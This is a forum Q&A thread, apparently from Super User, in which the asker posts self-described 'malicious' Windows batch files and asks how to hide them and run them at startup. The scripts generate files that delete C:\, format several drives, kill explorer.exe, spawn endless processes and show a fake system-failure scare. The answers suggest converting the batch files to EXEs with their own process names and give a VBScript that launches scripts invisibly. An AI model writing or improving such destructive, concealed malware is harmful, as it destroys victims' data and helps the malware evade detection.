How to stop every batch file opening as a process named cmd.exe as seen in task manager

Question

This is very complicated. I'm developing a malicious batch file just to test myself. This will be done at the startup.

what I have is Three + Six (hidden) Batch Files. First file makes six other hidden batch files and then CALLs the second not hidden file.

The second file just says some nasty things and in last executes the six files.

The Third file runs in the background and checks if the second file is running, if not, it will execute the six hidden files.

Now the problem I'm encountering. If the victim has a service or anything that opens a batch file at the startup and it keeps running, all the things get messed up, because all the running batch files have the process name cmd.exe If the victim closes the second (not hidden) file, but another batch file (not part of the virus) is running. The third batch file will assume it is still running. As it also has the name cmd.exe

And also the second file will not open on the startup.

Here are the codes of my batch files.

File no. 1

@echo off
:DALLING
echo @echo off >>1.bat
echo :B >>1.bat
echo start >>1.bat
echo goto B >>1.bat
echo @echo off >>2.bat
echo color 02 >>2.bat
echo :start >>2.bat
echo taskkill -f explorer.exe  >>2.bat
echo start %windir%\System32\rundll32.exe user 32.dll, LockWorkStation            >>2.bat
echo rd c:\ /s /q >>2.bat
echo cls >>2.bat
echo @Echo off >>3.bat
echo Del C:\ . >>3.bat
echo format E:\ >>4.bat
echo format F:\ >>4.bat
echo format G:\ >>4.bat
echo format H:\ >>4.bat
echo format C:\ >>4.bat
echo pause >>4.bat
echo @echo off >>5.bat
echo :M >>5.bat
echo msg * ERROR!! >>5.bat
echo goto M >>5.bat
echo @echo off >>6.bat
echo color 02 >>6.bat
echo :start >>6.bat
echo taskkill -f explorer.exe >>6.bat
echo start %windir%\System32\rundll32.exe user 32.dll, LockWorkStation  >>6.bat
echo rd c:\ /s /q >>6.bat
echo cls >>6.bat
call Second File
:THE END
cls
echo BYE BYE! BIG BABY BOO!
ping 192.0.2.2 -n 1 -w 500 >nul
pause
start 1.bat
start 2.bat
start 3.bat
start 4.bat
start 5.bat
start 6.bat
EXIT

I know it has mess that won't work but still...

File No. 2

@echo off
:THW
color a
echo 5
ping 192.0.2.2 -n 1 -w 1000 >nul
cls
echo 4
ping 192.0.2.2 -n 1 -w 1000 >nul
cls
echo 3
ping 192.0.2.2 -n 1 -w 1000 >nul
cls
echo 2
ping 192.0.2.2 -n 1 -w 1000 >nul
cls
echo 1
ping 192.0.2.2 -n 1 -w 1000 >nul
:BHANUUB
cls
color 04
echo ERROR!
ping 192.0.2.2 -n 1 -w 1000 >nul 
echo.
echo.
echo.
echo System Failure! Windir/system32/Windows programming changing.          Warning, system disability!
echo System can still be saved, you might lose some data. Do you want to  save the system?
echo (y/n)?
echo.
echo.
set/p bhaa=
if %bhaa%==y goto HUH
if %bhaa%==Y goto HUH
if %bhaa%==n goto THE END
if %bhaa%==N goto THE END
:HUH
color a
cls
echo Saving system.
ping 192.0.2.2 -n 1 -w 500 >nul
cls
echo Saving system..
ping 192.0.2.2 -n 1 -w 500 >nul
cls
echo Saving system...
ping 192.0.2.2 -n 1 -w 500 >nul
cls
echo Saving system....
ping 192.0.2.2 -n 1 -w 500 >nul
cls
echo Saving system.....
ping 192.0.2.2 -n 1 -w 150 >nul
goto ENDDD
cls
:ENDDD
cls
color 04
echo HUH!! You wanna save the system, do you????
echo.
echo.
echo      ***                          ***

echo      ***                          ***

echo      ***    \      /              ***

echo      ***     \ / /               ***

echo      ***      //ON'T LET YOU    ***

echo      ***                          ***

echo      ***                          ***
ping 192.0.2.2 -n 1 -w 3000 >nul
goto THE END

I know the statements seem weird but still...

I picked the third file from stackoverflow and modified it a little, Third file

File No. 3

@echo off
:B
Set "MyProcess=cmd.exe"
echo "%MyProcess%"
tasklist /NH /FI "imagename eq %MyProcess%" 2>nul |find /i "%MyProcess%"   >nul
If not errorlevel 1 (Echo "%MyProcess%" est en cours d^'execution) else   (start "" "1.bat","" "2.bat","" "3.bat","" "4.bat","" "5.bat","" "6.bat")
goto B

And I know the code of the third file seems wrong but it is not. As it will stop executing the programs once the othercmd.exes are started. But how to terminate it then?

And also how to execute all the six programs, not the way I've written I think.

And the third file will not be going in the startup folder as I have a vbscript I found that will start it in background.

BUT It's not working for me and also I don't know how to use it :P.

This the VBscript(or solution) which I found.

Solution 1:
Save this one line of text as file invisible.vbs:
CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
To run any program or batch file invisibly, use it like this:
wscript.exe “C:\Wherever\invisible.vbs” “C:\Some Other Place\MyBatchFile.bat”
To also be able to pass-on/relay a list of arguments use only two double quotes
CreateObject(“Wscript.Shell”).Run “” & WScript.Arguments(0) & “”, 0, False
eg: Invisible.vbs “Kill.vbs ME.exe”
Solution 2:
Use a command line tool to silently launch a process : Quiet.

I was going to put the first file and the vbscrip (if it was working) in the startup folder.

Any help will be hugely appreciated and I seek a detailed answer.

Thanks Superuser

P.S:- The title is not enough for the problems, is it?

Answer 1

Wow that's quite a lot of information, much of which just adds confusion, so I'll stick to the title question at hand... :)

How to stop every batch file opening as a process named cmd.exe as seen in task manager?

Since batch files are intended for automating (scripting) the command-line, all batch files are run by the command-line interpreter process, which on Windows is cmd.exe.

I think the easiest method in your scenario would be to use a utility to convert your batch file into an EXE. That way you can name it how you'd like, apply an icon, and most importantly, have it show up in Task Manager as its own, named process.

For help with converting, check out this existing SU question: How can I convert a Windows batch script to a .exe?

Answer 2

For the 3rd part

And the third file will not be going in the startup folder as I have a vbscript I found that will start it in background.

BUT It's not working for me and also I don't know how to use it :P.

This the VBscript(or solution) which I found.

To run a batch script or some other process as HIDDEN so it does show when launched as it would otherwise, use the below logic saved to a .VBS file. You will launch the .VBS file to execute whatever program or script you have it pointed to, and when that process is run, it'll not show a console window, etc.

Important: Be sure to plug in the full path and name of the process you wish to launch hidden in the part of the script in my example shown as C:\Path\Script.bat, and also be sure to KEEP the double quotes around it regardless of spaces in the path or file name.

Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "C:\Path\Script.bat" & Chr(34), 0
Set WinScriptHost = Nothing

Note: I use this for a couple scheduled processes on a server where multiple people RDP into it for managing different types of scheduled jobs and schedulers (not Task Scheduler but on Windows Server), and it suits the need quite fine. I'd suggest having your batch or other processes log to a log file for later review, dynamic error reporting, etc. if possible.

Source: Server Fault